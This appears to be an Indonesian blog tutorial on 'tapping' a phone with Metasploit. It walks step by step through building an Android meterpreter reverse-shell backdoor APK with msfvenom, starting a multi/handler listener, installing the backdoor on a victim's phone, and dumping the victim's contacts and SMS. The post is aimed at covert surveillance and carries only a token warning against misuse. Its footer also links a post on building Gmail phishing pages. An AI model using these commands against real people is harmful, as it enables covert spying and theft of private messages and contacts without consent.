Cara Sadap hp dengan metasploit.

Assalamualaikum wr.wb
Ketemu lagi dengan saya Rizky
conntact me:
WA: 08987125063
 Hari ini saya akan memberikan tutorial cara sadap hp dengan metasploit penasaran? Langsung aja ke tutorial jangan lupa follow IG w kimak.
Bahan
-HP diatas Lolipop
-Termux / jika Di PC Kali Linux
-Internet Lancar
-Metasploit Framework
-Kopi
Ok Gass Step By Step
Ikuti tutorialnya jgn sampe salah.

BUKA TERMUX / Kali Linux kalian
1. Cek IP kalian , caranya ketik ifconfig , disini IP saya Sensorrr
2. Buat backdoor , caranya masukkan perintah msfvenom -p
android/meterpreter/reverse_tcp LHOST=(IP kalian) LPORT=4444 R > andro.apk , masukkan
ip kalian tanpa tanda kurung
3. Beri hak akses untuk backdoor kalian tadi dengan perintah chmod 777 andro.apk
4. Buka metasploit nya dengan perintah msfconsole
5. Aktifkan exploit multi handler , caranya masukkan perintah use multi/handler
6. Aktifkan payloadnya, caranya masukkan perintah set payload
android/meterpreter/reverse_tcp
7. Set Ip kalian dengan perintah set LHOST 192.168.43.230 , (masukkan ip kalian sesuai
dengan step no 1 yaa)
8. Kemudian set portnya , caraya masukkan perintah set LPORT 4444
9. Terakhir jalankan Exploitnya dengan memasukkan perintah exploit
10. Setelah semuanya selesai sekarang tugas kalian untuk menginstall backdoor tadi ke Hp
korban
11. ketik help kemudian enter, untuk mengetahui perintah apa saja yang bisa dipakai
12. Disini saya akan mencoba melihat isi kontak di hp korban saya, untuk itu masukkan
perintah dump_contacts , dan berhasil 
13. Selanjutnya saya akan coba lihat sms di hp korban saya caranya masukkam
perintah dump_sms
😬
Sekian, semoga bermanfaat dan jangan
disalah gunakan ya :)
Wassalamu'alaikum wr.wb

Komentar

Postingan populer dari blog ini

Top 10 hacking tool for hackers

Cara membuat phising gmail